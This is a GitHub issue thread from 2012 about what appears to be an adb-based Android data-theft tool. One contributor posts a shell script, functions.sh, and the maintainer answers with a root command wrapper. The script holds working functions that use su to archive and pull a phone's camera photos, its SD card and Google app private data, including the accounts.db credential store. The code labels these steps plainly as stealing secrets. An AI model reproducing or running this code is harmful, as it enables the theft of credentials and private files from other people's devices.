Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Already on GitHub? Sign in to your account

Not really an issue more of an update.. #1

Closed
jadedsecurity opened this Issue Aug 13, 2012 · 6 comments

Comments

Projects
None yet
2 participants

You rock bro!!!

On stock roms the IMG has to be rebuilt to force adb into a default root shell.. I updated functions.sh to

if [ "$(adb shell "su -c 'whoami'" | tr -d '\r' )" = 'uid=0(root) gid=0(root)' ]; then

Works fine.. you also need to either set a variable for adb shell su or just add it to the rest of the functions like

adb shell "su -c 'command1; command2, command3'"

And Google Data on Jelly Bean is now

/data/system/users/0/accounts.db

so maybe an elif for 4.1>

version=$(adb shell getprop |awk -F":" '/build.version.release/ { print $2 }')|tr -d '[]'

Owner

kosborn commented Aug 14, 2012

That's a good point, I should probably work on passing su with every command when it's found that you're not already root.

Yeah, I've been planning on updating it to support the multi-account. Thanks.

Here is my updated functions.sh, I've been messing with getting USB Debug enabled using something like SET for a while.. Maybe a QR code that installs an APK that does it. There used to be a toggle app but I can't find it.


# Let's just make sure ADB is available...

if adb version >/dev/null; then
        # good to go
        true
else
        echo "${red}adb is not in your \$PATH"
        echo "Add it, or modify run.sh${none}"
        exit
fi


# Check to see if a device is connected
isConnected(){

        # $LINECOUNT =
        # 2 if none
        # >2 if yes
        LINECOUNT=$(adb devices|wc -l)


        if [ $LINECOUNT -gt 2 ]
        then
                echo "YES"
                return 0
        else
                echo "NO"
                return 1
        fi
}

# Check to see if we're root on the device
isRoot(){

        YayRoot=$(adb shell "su -c 'cd /root'")

        if [ "$?" = "0" ]
        then
                echo "You are GOD"
                return 0
        else 
                echo "Running as shell"
                return 1
        
            fi
}

# Check the size of a directory or more
dataSize(){
        adb shell "su -c '"du -hc $*"'" | tail -n1
}



# Prepare to get the directory passed in the argument
getData(){
        DATAPATH="$*"
        echo "Calculating size of: $DATAPATH"
        SIZE=$(dataSize "$DATAPATH")
        echo "The size of $DATAPATH is: $SIZE"
        echo -n 'Continue? [Y/n] '
        read REPLY
        case "$REPLY" in
         y|Y|'') getDataProto "$DATAPATH"  ;;
         n|N) echo "Cancelling..." ;;
         *) echo "Cancelling..." ;;
        esac
}

# Actually get the file
getDataProto(){
        FILENAME=jacked_$(date +%s).tar
        adb shell "su -c 'tar -cf - * 2>/dev/null'" | base64 | tr -d "\r" | base64 -d > jacked_$(date +%s).tar
        echo "The file has been saved as $FILENAME"
}



# Steal all the pictures
getPhotos(){

DIREXISTS=$(adb shell '[[ -d /sdcard/DCIM/Camera/  ]] && echo 1' | tr -d "\r")

if [ "$DIREXISTS" = "1" ]; then
        DATAPATH='/sdcard/DCIM/Camera'
        getSearch "$DATAPATH" "*.jpg" "+200k"
else
        echo "Camera directory doesn't exist?"
fi
}

# Steal Google Private App data
getGoogles(){

jellybean=$(adb shell "su -c 'ls /data/user/0/'")

    if [ "$?" = "0" ]
     then
        beandata='/data/user/0/*'
            echo "This is jellyBean, Stealing all the Secrets"
                adb shell "su -c 'tar -cf - $beandata 2>/dev/null'" | base64 | tr -d "\r" | base64 -d > jellybeandata$(date +%s).tar    
                     
                    elif ["$?" = "1"]
                        then 
                        nonbeandata='/data/data/com.google.*'
                            echo "Pre JellyBean going to Steal the old way"
                                adb shell "su -c 'tar -cf - $nonbeandata 2>/dev/null'" | base64 | tr -d "\r" | base64 -d > nonbeandata$(date +%s).tar
else
        echo "#Winning"
        fi
}

# Actually get the file
getSDCard(){
       
        FILENAME=jackedsdcard_$(date +%s).tar
         adb shell "su -c 'tar -cf - /sdcard/* 2>/dev/null'" | base64 | tr -d "\r" | base64 -d > jackedsdcard_$(date +%s).tar
            echo "The file has been saved as $FILENAME"
}

Owner

kosborn commented Aug 14, 2012

You wanna reformat that using GitHub's markdown? :)

Meh... I don't always git but when I do I it's always wrong..

Owner

kosborn commented Aug 25, 2012

I've implemented some of the changes in my own code (limitations of sh required me to do some other crap, so I couldn't take verbatim from you.) Commit d271e24.

Non-root -> root (if possible) is now abstracted to the "command" alias.

command(){
        echo "$*" > $TMP/p2p-tmp
        adb push $TMP/p2p-tmp $RTMP/p2p-tmp 2>/dev/null
        if [ "$ISROOT" -eq "1" ]
        then
                adb shell "su -c 'sh $RTMP/p2p-tmp'" | tr -d "\r"
        else
                adb shell "sh $RTMP/p2p-tmp" | tr -d "\r"
        fi
        adb shell "rm $RTMP/p2p-tmp" 2>/dev/null
}

Also, instead of passing commands directly to adb shell, the commands will be thrown into a file, and adb pushed to the phone to a temporary folder (/data/share/tmp/ appears to always be there), and execute the shell script there. I think the way I'm sticking them into the file (the echo "$*" part) is sane...

There are also 4 possible IDs for $ISROOT (variable should probably be renamed, actually.)
0 = root immediatey.
1 = root after 'su'.
2 = shell user
3 = what is this I don't even (seriously, this probably means the script screwed up, or the shell user isn't UID 2000, which I don't think is possible.)

Owner

kosborn commented Aug 25, 2012

With the new user profiles, app-data could also be located in a different location, so I'll try to figure out the best way to abstract any call to data to automatically take into account user data (or maybe just pull /data/user//data/ to save time).

@kosborn kosborn closed this Oct 8, 2012

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment